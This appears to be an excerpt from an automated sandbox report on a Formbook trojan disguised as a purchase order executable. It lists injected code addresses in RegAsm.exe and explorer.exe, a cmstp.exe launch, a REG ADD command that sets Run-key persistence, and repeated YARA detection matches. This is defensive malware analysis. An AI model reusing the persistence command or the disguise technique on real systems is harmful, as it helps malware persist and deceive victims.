Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03369EB0	7_2_03369EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03411D5A	7_2_03411D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03417D73	7_2_03417D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03363D40	7_2_03363D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337FDC0	7_2_0337FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D9C32	7_2_033D9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341FCF2	7_2_0341FCF2
Source: C:\Windows\explorer.exe	Code function: 8_2_08D6A082	8_2_08D6A082
Source: C:\Windows\explorer.exe	Code function: 8_2_08D73036	8_2_08D73036
Source: C:\Windows\explorer.exe	Code function: 8_2_08D775CD	8_2_08D775CD
Source: C:\Windows\explorer.exe	Code function: 8_2_08D71912	8_2_08D71912
Source: C:\Windows\explorer.exe	Code function: 8_2_08D6BD02	8_2_08D6BD02
Source: C:\Windows\explorer.exe	Code function: 8_2_08D74232	8_2_08D74232
Source: C:\Windows\explorer.exe	Code function: 8_2_08D6EB32	8_2_08D6EB32
Source: C:\Windows\explorer.exe	Code function: 8_2_08D6EB30	8_2_08D6EB30
Source: C:\Windows\explorer.exe	Code function: 8_2_0B895B30	8_2_0B895B30
Source: C:\Windows\explorer.exe	Code function: 8_2_0B895B32	8_2_0B895B32
Source: C:\Windows\explorer.exe	Code function: 8_2_0B89B232	8_2_0B89B232
Source: C:\Windows\explorer.exe	Code function: 8_2_0B89E5CD	8_2_0B89E5CD
Source: C:\Windows\explorer.exe	Code function: 8_2_0B892D02	8_2_0B892D02
Source: C:\Windows\explorer.exe	Code function: 8_2_0B898912	8_2_0B898912
Source: C:\Windows\explorer.exe	Code function: 8_2_0B891082	8_2_0B891082
Source: C:\Windows\explorer.exe	Code function: 8_2_0B89A036	8_2_0B89A036
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE39B32	8_2_0BE39B32
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE39B30	8_2_0BE39B30
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE3F232	8_2_0BE3F232
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE425CD	8_2_0BE425CD
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE36D02	8_2_0BE36D02
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE3C912	8_2_0BE3C912
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE35082	8_2_0BE35082
Source: C:\Windows\explorer.exe	Code function: 8_2_0BE3E036	8_2_0BE3E036
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5B0232	8_2_0E5B0232
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5AAB32	8_2_0E5AAB32
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5AAB30	8_2_0E5AAB30
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5AF036	8_2_0E5AF036
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5A6082	8_2_0E5A6082
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5AD912	8_2_0E5AD912
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5A7D02	8_2_0E5A7D02
Source: C:\Windows\explorer.exe	Code function: 8_2_0E5B35CD	8_2_0E5B35CD
Source: C:\Windows\explorer.exe	Code function: 8_2_0E753232	8_2_0E753232
Source: C:\Windows\explorer.exe	Code function: 8_2_0E74DB30	8_2_0E74DB30
Source: C:\Windows\explorer.exe	Code function: 8_2_0E74DB32	8_2_0E74DB32
Source: C:\Windows\explorer.exe	Code function: 8_2_0E752036	8_2_0E752036
Source: C:\Windows\explorer.exe	Code function: 8_2_0E749082	8_2_0E749082
Source: C:\Windows\explorer.exe	Code function: 8_2_0E750912	8_2_0E750912
Source: C:\Windows\explorer.exe	Code function: 8_2_0E74AD02	8_2_0E74AD02
Source: C:\Windows\explorer.exe	Code function: 8_2_0E7565CD	8_2_0E7565CD
Source: C:\Windows\explorer.exe	Code function: 8_2_0E87D232	8_2_0E87D232
Source: C:\Windows\explorer.exe	Code function: 8_2_0E877B32	8_2_0E877B32
Source: C:\Windows\explorer.exe	Code function: 8_2_0E877B30	8_2_0E877B30
Source: C:\Windows\explorer.exe	Code function: 8_2_0E873082	8_2_0E873082
Source: C:\Windows\explorer.exe	Code function: 8_2_0E87C036	8_2_0E87C036
Source: C:\Windows\explorer.exe	Code function: 8_2_0E8805CD	8_2_0E8805CD
Source: C:\Windows\explorer.exe	Code function: 8_2_0E874D02	8_2_0E874D02
Source: C:\Windows\explorer.exe	Code function: 8_2_0E87A912	8_2_0E87A912
Source: C:\Windows\explorer.exe	Code function: 8_2_101E2036	8_2_101E2036
Source: C:\Windows\explorer.exe	Code function: 8_2_101D9082	8_2_101D9082
Source: C:\Windows\explorer.exe	Code function: 8_2_101E0912	8_2_101E0912
Source: C:\Windows\explorer.exe	Code function: 8_2_101DAD02	8_2_101DAD02
Source: C:\Windows\explorer.exe	Code function: 8_2_101E65CD	8_2_101E65CD
Source: C:\Windows\explorer.exe	Code function: 8_2_101E3232	8_2_101E3232
Source: C:\Windows\explorer.exe	Code function: 8_2_101DDB30	8_2_101DDB30
Source: C:\Windows\explorer.exe	Code function: 8_2_101DDB32	8_2_101DDB32
Source: C:\Windows\explorer.exe	Code function: 8_2_102C4036	8_2_102C4036
Source: C:\Windows\explorer.exe	Code function: 8_2_102BB082	8_2_102BB082
Source: C:\Windows\explorer.exe	Code function: 8_2_102BCD02	8_2_102BCD02
Source: C:\Windows\explorer.exe	Code function: 8_2_102C2912	8_2_102C2912
Source: C:\Windows\explorer.exe	Code function: 8_2_102C85CD	8_2_102C85CD
Source: C:\Windows\explorer.exe	Code function: 8_2_102C5232	8_2_102C5232
Source: C:\Windows\explorer.exe	Code function: 8_2_102BFB32	8_2_102BFB32
Source: C:\Windows\explorer.exe	Code function: 8_2_102BFB30	8_2_102BFB30
Source: C:\Windows\explorer.exe	Code function: 8_2_1041E036	8_2_1041E036
Source: C:\Windows\explorer.exe	Code function: 8_2_10415082	8_2_10415082
Source: C:\Windows\explorer.exe	Code function: 8_2_10416D02	8_2_10416D02
Source: C:\Windows\explorer.exe	Code function: 8_2_1041C912	8_2_1041C912
Source: C:\Windows\explorer.exe	Code function: 8_2_104225CD	8_2_104225CD
Source: C:\Windows\explorer.exe	Code function: 8_2_1041F232	8_2_1041F232
Source: C:\Windows\explorer.exe	Code function: 8_2_10419B30	8_2_10419B30
Source: C:\Windows\explorer.exe	Code function: 8_2_10419B32	8_2_10419B32
Source: C:\Windows\explorer.exe	Code function: 8_2_106F5036	8_2_106F5036
Source: C:\Windows\explorer.exe	Code function: 8_2_106EC082	8_2_106EC082
Source: C:\Windows\explorer.exe	Code function: 8_2_106EDD02	8_2_106EDD02
Source: C:\Windows\explorer.exe	Code function: 8_2_106F3912	8_2_106F3912
Source: C:\Windows\explorer.exe	Code function: 8_2_106F95CD	8_2_106F95CD
Source: C:\Windows\explorer.exe	Code function: 8_2_106F6232	8_2_106F6232
Source: C:\Windows\explorer.exe	Code function: 8_2_106F0B32	8_2_106F0B32
Source: C:\Windows\explorer.exe	Code function: 8_2_106F0B30	8_2_106F0B30
Source: C:\Windows\explorer.exe	Code function: 8_2_1135C232	8_2_1135C232
Source: C:\Windows\explorer.exe	Code function: 8_2_11356B30	8_2_11356B30
Source: C:\Windows\explorer.exe	Code function: 8_2_11356B32	8_2_11356B32
Source: C:\Windows\explorer.exe	Code function: 8_2_11359912	8_2_11359912
Source: C:\Windows\explorer.exe	Code function: 8_2_11353D02	8_2_11353D02
Source: C:\Windows\explorer.exe	Code function: 8_2_1135F5CD	8_2_1135F5CD
Source: C:\Windows\explorer.exe	Code function: 8_2_1135B036	8_2_1135B036
Source: C:\Windows\explorer.exe	Code function: 8_2_11352082	8_2_11352082
Source: C:\Windows\explorer.exe	Code function: 8_2_114A9D02	8_2_114A9D02
Source: C:\Windows\explorer.exe	Code function: 8_2_114AF912	8_2_114AF912
Source: C:\Windows\explorer.exe	Code function: 8_2_114B55CD	8_2_114B55CD
Source: C:\Windows\explorer.exe	Code function: 8_2_114B1036	8_2_114B1036
Source: C:\Windows\explorer.exe	Code function: 8_2_114A8082	8_2_114A8082
Source: C:\Windows\explorer.exe	Code function: 8_2_114ACB32	8_2_114ACB32
Source: C:\Windows\explorer.exe	Code function: 8_2_114ACB30	8_2_114ACB30
Source: C:\Windows\explorer.exe	Code function: 8_2_114B2232	8_2_114B2232
Source: C:\Windows\explorer.exe	Code function: 8_2_11B705CD	8_2_11B705CD
Source: C:\Windows\explorer.exe	Code function: 8_2_11B6A912	8_2_11B6A912
Source: C:\Windows\explorer.exe	Code function: 8_2_11B64D02	8_2_11B64D02
Source: C:\Windows\explorer.exe	Code function: 8_2_11B63082	8_2_11B63082
Source: C:\Windows\explorer.exe	Code function: 8_2_11B6C036	8_2_11B6C036
Source: C:\Windows\explorer.exe	Code function: 8_2_11B67B32	8_2_11B67B32
Source: C:\Windows\explorer.exe	Code function: 8_2_11B67B30	8_2_11B67B30
Source: C:\Windows\explorer.exe	Code function: 8_2_11B6D232	8_2_11B6D232

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 033CEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 03395130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 033DF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0334B970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 033A7E54 appears 111 times

Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000002.2173126899.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PURCHASED ORDER OF ENG091.exe
Source: PURCHASED ORDER OF ENG091.exe, 00000000.00000000.2119860002.0000000000448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAewlani.exe4 vs PURCHASED ORDER OF ENG091.exe

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif"

Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PURCHASED ORDER OF ENG091.exe.389a1f0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000002D.00000002.2649126395.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.3387644205.000000000EB42000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000026.00000002.2627604465.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000002E.00000002.2712579590.0000000004028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2176143982.000000000389A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000035.00000002.2731575552.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2235289603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2176143982.0000000003A5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.2500819565.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.2367170516.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3365508291.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
